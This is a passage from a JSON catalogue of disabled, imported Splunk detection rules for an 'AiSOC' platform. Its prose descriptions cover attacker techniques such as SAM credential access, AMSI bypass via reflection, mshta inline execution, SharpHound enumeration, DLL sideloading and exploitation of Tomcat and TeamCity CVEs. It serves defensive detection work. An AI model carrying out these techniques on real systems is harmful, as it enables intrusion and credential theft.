to delete repositories to destroy source code, intellectual property, or evidence of compromise. Repository deletion can result in permanent loss of code, documentation, and project history if proper backups are not maintained. Additionally, unauthorized repository deletion could indicate account compromise, insider threats, or attempts to disrupt business operations. The impact of a repository deletion attack includes loss of intellectual property, disruption to development workflows, and potential financial losses from lost work. Early detection of unauthorized repository deletions allows security teams to investigate potential compromises and restore from backups if needed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-organizations-repository-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9ff4ca95-fdae-4eea-9ffa-6d8e1c202a71", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_organizations_repository_deleted.yml" } }, { "id": "splunk-security-content-a02ad386-e26d-44ce-aa97-6a46cee31439", "type": "detection", "name": "Windows Modify Registry WuServer", "description": "The following analytic detects suspicious modifications to the Windows Update Server (WUServer) registry settings. It leverages data from the Endpoint.Registry data model to identify changes in the registry path associated with Windows Update configurations. This activity is significant because adversaries, including malware like RedLine Stealer, exploit this technique to bypass detection and deploy additional payloads. If confirmed malicious, this registry modification could allow attackers to evade defenses, potentially leading to further system compromise and persistent unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-wuserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a02ad386-e26d-44ce-aa97-6a46cee31439", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_wuserver.yml" } }, { "id": "splunk-security-content-a04832e7-9d1d-49b1-a684-e31bcd775c77", "type": "detection", "name": "MacOS LoginHook Persistence", "description": "Identifies attempts to configure a macOS LoginHook via the defaults utility. LoginHooks enable automatic execution of a script or program upon user login and have historically been abused for persistence.\nCreation or modification of this setting may indicate an attempt to establish startup execution outside standard LaunchAgent mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1037.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-loginhook-persistence.yaml", "provenance": { "source": "splunk/security_content", "source_id": "a04832e7-9d1d-49b1-a684-e31bcd775c77", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_loginhook_persistence.yml" } }, { "id": "splunk-security-content-a081836a-ba4d-11eb-8593-acde48001122", "type": "detection", "name": "WinRM Spawning a Process", "description": "The following analytic detects suspicious processes spawned by WinRM (wsmprovhost.exe). It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific child processes like cmd.exe, powershell.exe, and others. This activity is significant as it may indicate exploitation attempts of vulnerabilities like CVE-2021-31166, which could lead to system instability or compromise. If confirmed malicious, attackers could execute arbitrary commands, escalate privileges, or maintain persistence, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/winrm-spawning-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a081836a-ba4d-11eb-8593-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/winrm_spawning_a_process.yml" } }, { "id": "splunk-security-content-a0873b32-5b68-11eb-ae93-0242ac130002", "type": "detection", "name": "Detect mshta inline hta execution", "description": "The following analytic detects the execution of \"mshta.exe\" with inline protocol handlers such as \"JavaScript\", \"VBScript\", and \"About\". It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line arguments and process details. This activity is significant because mshta.exe can be exploited to execute malicious scripts, potentially leading to unauthorized code execution. If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or establish persistence within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-mshta-inline-hta-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a0873b32-5b68-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_mshta_inline_hta_execution.yml" } }, { "id": "splunk-security-content-a0bdd2f6-c2ff-11eb-b918-acde48001122", "type": "detection", "name": "Detect SharpHound Command-Line Arguments", "description": "The following analytic detects the execution of SharpHound command-line arguments, specifically `-collectionMethod` and `invoke-bloodhound`. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as SharpHound is commonly used for Active Directory enumeration, which can be a precursor to lateral movement or privilege escalation. If confirmed malicious, this activity could allow an attacker to map out the network, identify high-value targets, and plan further attacks, potentially compromising sensitive information and critical systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-sharphound-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a0bdd2f6-c2ff-11eb-b918-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_sharphound_command_line_arguments.yml" } }, { "id": "splunk-security-content-a0c21379-f4ba-4bac-a958-897e260f964a", "type": "detection", "name": "Zscaler Scam Destinations Threat Blocked", "description": "The following analytic identifies blocked scam-related activities detected by Zscaler within a network. It leverages web proxy logs to examine actions flagged as scam threats, focusing on data points such as device owner, user, URL category, destination URL, and IP. This detection is significant for SOC as it helps in the early identification and mitigation of scam activities, ensuring network safety. If confirmed malicious, this activity could indicate attempts to deceive users, potentially leading to data theft or financial loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-scam-destinations-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a0c21379-f4ba-4bac-a958-897e260f964a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_scam_destinations_threat_blocked.yml" } }, { "id": "splunk-security-content-a115fba6-5514-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious MSBuild Spawn", "description": "The following analytic identifies instances where wmiprvse.exe spawns msbuild.exe, which is unusual and indicative of potential misuse of a COM object. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process relationships and command-line executions. This activity is significant because msbuild.exe is typically spawned by devenv.exe during legitimate Visual Studio use, not by wmiprvse.exe. If confirmed malicious, this behavior could indicate an attacker executing arbitrary code or scripts, potentially leading to system compromise or further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-msbuild-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a115fba6-5514-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_msbuild_spawn.yml" } }, { "id": "splunk-security-content-a14803b2-4bd9-4c08-8b57-c37980edebe8", "type": "detection", "name": "Windows Forest Discovery with GetForestDomain", "description": "The following analytic detects the execution of the `Get-ForestDomain` cmdlet, a component of the PowerView toolkit used for Windows domain enumeration. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this activity. Detecting `Get-ForestDomain` is significant because adversaries and Red Teams use it to gather detailed information about Active Directory forest and domain configurations. If confirmed malicious, this activity could enable attackers to understand the domain structure, facilitating lateral movement or privilege escalation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-forest-discovery-with-getforestdomain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a14803b2-4bd9-4c08-8b57-c37980edebe8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_forest_discovery_with_getforestdomain.yml" } }, { "id": "splunk-security-content-a15aa1ab-2b79-467f-8201-65e0f32d5b1a", "type": "detection", "name": "Windows RunMRU Command Execution", "description": "The following analytic detects modifications to the Windows RunMRU registry key, which stores a history of commands executed through the Run dialog box (Windows+R). It leverages Endpoint Detection and Response (EDR) telemetry to monitor registry events targeting this key. This activity is significant as malware often uses the Run dialog to execute malicious commands while attempting to appear legitimate. If confirmed malicious, this could indicate an attacker using indirect command execution techniques for defense evasion or persistence. The detection excludes MRUList value changes to focus on actual command entries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-runmru-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a15aa1ab-2b79-467f-8201-65e0f32d5b1a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_runmru_command_execution.yml" } }, { "id": "splunk-security-content-a16b797d-e309-41bd-8ba0-5067dae2e4be", "type": "detection", "name": "Detect Remote Access Software Usage DNS", "description": "The following analytic detects DNS queries to domains associated with known remote access software such as AnyDesk, GoToMyPC, LogMeIn, and TeamViewer. This detection is crucial as adversaries often use these tools to maintain access and control over compromised environments. Identifying such behavior is vital for a Security Operations Center (SOC) because unauthorized remote access can lead to data breaches, ransomware attacks, and other severe impacts if these threats are not mitigated promptly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-dns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a16b797d-e309-41bd-8ba0-5067dae2e4be", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_remote_access_software_usage_dns.yml" } }, { "id": "splunk-security-content-a17af481-e2ad-494c-9da6-afb4d243a019", "type": "detection", "name": "Windows Registry Entries Restored Via Reg", "description": "The following analytic detects the execution of reg.exe with the \"restore\" parameter, indicating an attempt to restore registry backup data on a host. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant as it may indicate post-exploitation actions, such as those performed by tools like winpeas, which use \"reg save\" and \"reg restore\" to manipulate registry settings. If confirmed malicious, this could allow an attacker to revert registry changes, potentially bypassing security controls and maintaining persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-entries-restored-via-reg.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a17af481-e2ad-494c-9da6-afb4d243a019", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_entries_restored_via_reg.yml" } }, { "id": "splunk-security-content-a18e85d7-8b98-4399-820c-d46a1ca3516f", "type": "detection", "name": "Windows Gather Victim Identity SAM Info", "description": "The following analytic detects processes loading the samlib.dll or samcli.dll modules, which are often abused to access Security Account Manager (SAM) objects or credentials on domain controllers. This detection leverages Sysmon EventCode 7 to identify these DLLs being loaded outside typical system directories. Monitoring this activity is crucial as it may indicate attempts to gather sensitive identity information. If confirmed malicious, this behavior could allow attackers to obtain credentials, escalate privileges, or further infiltrate the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1589.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-gather-victim-identity-sam-info.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a18e85d7-8b98-4399-820c-d46a1ca3516f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_gather_victim_identity_sam_info.yml" } }, { "id": "splunk-security-content-a19b354d-0d7f-47f3-8ea6-1a7c36434968", "type": "detection", "name": "AWS Credential Access Failed Login", "description": "The following analytic identifies unsuccessful login attempts to the AWS Management Console using a specific user identity. It leverages AWS CloudTrail logs to detect failed authentication events associated with the AWS ConsoleLogin action. This activity is significant for a SOC because repeated failed login attempts may indicate a brute force attack or unauthorized access attempts. If confirmed malicious, an attacker could potentially gain access to AWS account services and resources, leading to data breaches, resource manipulation, or further exploitation within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-credential-access-failed-login.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a19b354d-0d7f-47f3-8ea6-1a7c36434968", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_credential_access_failed_login.yml" } }, { "id": "splunk-security-content-a1b229e9-d962-4222-8c62-905a8a010453", "type": "detection", "name": "O365 Service Principal New Client Credentials", "description": "The following analytic detects the addition of new credentials for Service Principals within an Office 365 tenant. It uses O365 audit logs, focusing on events related to credential modifications or additions in the AzureActiveDirectory workload. This activity is significant because Service Principals represent application identities, and their credentials allow applications to authenticate and access resources. If an attacker successfully adds or modifies these credentials, they can impersonate the application, leading to unauthorized data access, data exfiltration, or malicious operations under the application's identity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-service-principal-new-client-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a1b229e9-d962-4222-8c62-905a8a010453", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_service_principal_new_client_credentials.yml" } }, { "id": "splunk-security-content-a1b2c3d4-e5f6-4789-a012-3456789abcde", "type": "detection", "name": "Windows BitDefender Submission Wizard DLL Sideloading", "description": "Detects DLL side-loading of Bitdefender Submission Wizard (BDSubmit.exe, bdsw.exe, or renamed BluetoothService.exe) when a malicious log.dll is loaded from a non-standard path via Sysmon ImageLoad events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bitdefender-submission-wizard-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a1b2c3d4-e5f6-4789-a012-3456789abcde", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bitdefender_submission_wizard_dll_sideloading.yml" } }, { "id": "splunk-security-content-a1c5a85e-a162-410c-a5d9-99ff639e5a52", "type": "detection", "name": "GCP Detect gcploit framework", "description": "The following analytic identifies the use of the GCPloit exploitation framework within Google Cloud Platform (GCP). It detects specific GCP Pub/Sub messages with a function timeout of 539 seconds, which is indicative of GCPloit activity. This detection is significant as GCPloit can be used to escalate privileges and facilitate lateral movement from compromised high-privilege accounts. If confirmed malicious, this activity could allow attackers to gain unauthorized access, escalate their privileges, and move laterally within the GCP environment, potentially compromising sensitive data and critical resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-detect-gcploit-framework.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a1c5a85e-a162-410c-a5d9-99ff639e5a52", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_detect_gcploit_framework.yml" } }, { "id": "splunk-security-content-a1d8f5c3-9b7e-4f2d-8c51-3bca5e672410", "type": "detection", "name": "Tomcat Session File Upload Attempt", "description": "This detection identifies potential exploitation of CVE-2025-24813 in Apache Tomcat through the initial stage of the attack. This first phase occurs when an attacker attempts to upload a malicious serialized Java object with a .session file extension via an HTTP PUT request. When successful, these uploads typically result in HTTP status codes 201 (Created) or 409 (Conflict) and create the foundation for subsequent deserialization attacks by placing malicious content in a location where Tomcat's session management can access it.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/tomcat-session-file-upload-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a1d8f5c3-9b7e-4f2d-8c51-3bca5e672410", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/tomcat_session_file_upload_attempt.yml" } }, { "id": "splunk-security-content-a1e68dcd-2e24-4434-bd0e-b3d4de139d58", "type": "detection", "name": "JetBrains TeamCity Limited Auth Bypass Suricata CVE-2024-27199", "description": "The following analytic identifies attempts to exploit CVE-2024-27199, a critical vulnerability in JetBrains TeamCity web server, allowing unauthenticated access to specific endpoints. It detects unusual access patterns to vulnerable paths such as /res/, /update/, and /.well-known/acme-challenge/ by monitoring HTTP traffic logs via Suricata. This activity is significant as it could indicate an attacker bypassing authentication to access or modify system settings. If confirmed malicious, this could lead to unauthorized changes, disclosure of sensitive information, or uploading of malicious certificates, severely compromising the server's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/jetbrains-teamcity-limited-auth-bypass-suricata-cve-2024-27199.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a1e68dcd-2e24-4434-bd0e-b3d4de139d58", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/jetbrains_teamcity_limited_auth_bypass_suricata_cve_2024_27199.yml" } }, { "id": "splunk-security-content-a1e761ac-1344-4dbd-88b2-3f34c912d359", "type": "detection", "name": "Detect hosts connecting to dynamic domain providers", "description": "The following analytic identifies DNS queries from internal hosts to dynamic domain providers. It leverages DNS query logs from the `Network_Resolution` data model and cross-references them with a lookup file containing known dynamic DNS providers. This activity is significant because attackers often use dynamic DNS services to host malicious payloads or command-and-control servers, making it crucial for security teams to monitor. If confirmed malicious, this activity could allow attackers to bypass firewall blocks, evade detection, and maintain persistent access to the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1189" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-hosts-connecting-to-dynamic-domain-providers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a1e761ac-1344-4dbd-88b2-3f34c912d359", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_hosts_connecting_to_dynamic_domain_providers.yml" } }, { "id": "splunk-security-content-a203040e-f8fd-49bb-8424-d2fabf277322", "type": "detection", "name": "Windows ConsoleHost History File Deletion", "description": "The following analytic detects the deletion of the ConsoleHost_history.txt file, which stores command history for PowerShell sessions. Attackers may attempt to remove this file to cover their tracks and evade detection during post-exploitation activities. This detection focuses on file deletion commands executed via PowerShell, Command Prompt, or scripting languages that specifically target ConsoleHost_history.txt, typically located at %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt. Identifying such activity can help uncover potential anti-forensic behavior and suspicious administrative actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-consolehost-history-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a203040e-f8fd-49bb-8424-d2fabf277322", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_consolehost_history_file_deletion.yml" } }, { "id": "splunk-security-content-a21e3484-c94d-11eb-b55b-acde48001122", "type": "detection", "name": "Unloading AMSI via Reflection", "description": "The following analytic detects the tampering of AMSI (Antimalware Scan Interface) via PowerShell reflection. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze suspicious PowerShell commands, specifically those involving `system.management.automation.amsi`. This activity is significant as it indicates an attempt to bypass AMSI, a critical security feature that helps detect and block malicious scripts. If confirmed malicious, this could allow an attacker to execute harmful code undetected, leading to potential system compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unloading-amsi-via-reflection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a21e3484-c94d-11eb-b55b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unloading_amsi_via_reflection.yml" } }, { "id": "splunk-security-content-a2276412-e254-4e9a-9082-4d92edb6a3e0", "type": "detection", "name": "Windows Modify Registry NoChangingWallPaper", "description": "The following analytic detects modifications to the Windows registry aimed at preventing wallpaper changes. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the \"NoChangingWallPaper\" registry value. This activity is significant as it is a known tactic used by Rhysida ransomware to enforce a malicious wallpaper, thereby limiting user control over system settings. If confirmed malicious, this registry change could indicate a ransomware infection, leading to further system compromise and user disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-nochangingwallpaper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a2276412-e254-4e9a-9082-4d92edb6a3e0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_nochangingwallpaper.yml" } }, { "id": "splunk-security-content-a258bf2a-34fd-4986-8086-78f506e00206", "type": "detection", "name": "Windows Alternate DataStream - Executable Content", "description": "The following analytic detects the writing of data with an IMPHASH value to an Alternate Data Stream (ADS) in the NTFS file system. It leverages Sysmon Event ID 15 and regex to identify files with a Portable Executable (PE) structure. This activity is significant as it may indicate a threat actor staging malicious code in hidden areas for persistence or future execution. If confirmed malicious, this could allow attackers to execute hidden code, maintain persistence, or escalate privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-alternate-datastream-executable-content.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a258bf2a-34fd-4986-8086-78f506e00206", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_alternate_datastream___executable_content.yml" } }, { "id": "splunk-security-content-a2625034-c2de-44fc-b45c-7bac9c4a7974", "type": "detection", "name": "ASL AWS Network Access Control List Created with All Open Ports", "description": "The following analytic detects the creation of AWS Network Access Control Lists (ACLs) with all ports open to a specified CIDR. It leverages AWS CloudTrail events, specifically monitoring for `CreateNetworkAclEntry` or `ReplaceNetworkAclEntry` actions with rules allowing all traffic. This activity is significant because it can expose the network to unauthorized access, increasing the risk of data breaches and other malicious activities. If confirmed malicious, an attacker could exploit this misconfiguration to gain unrestricted access to the network, potentially leading to data exfiltration, service disruption, or further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 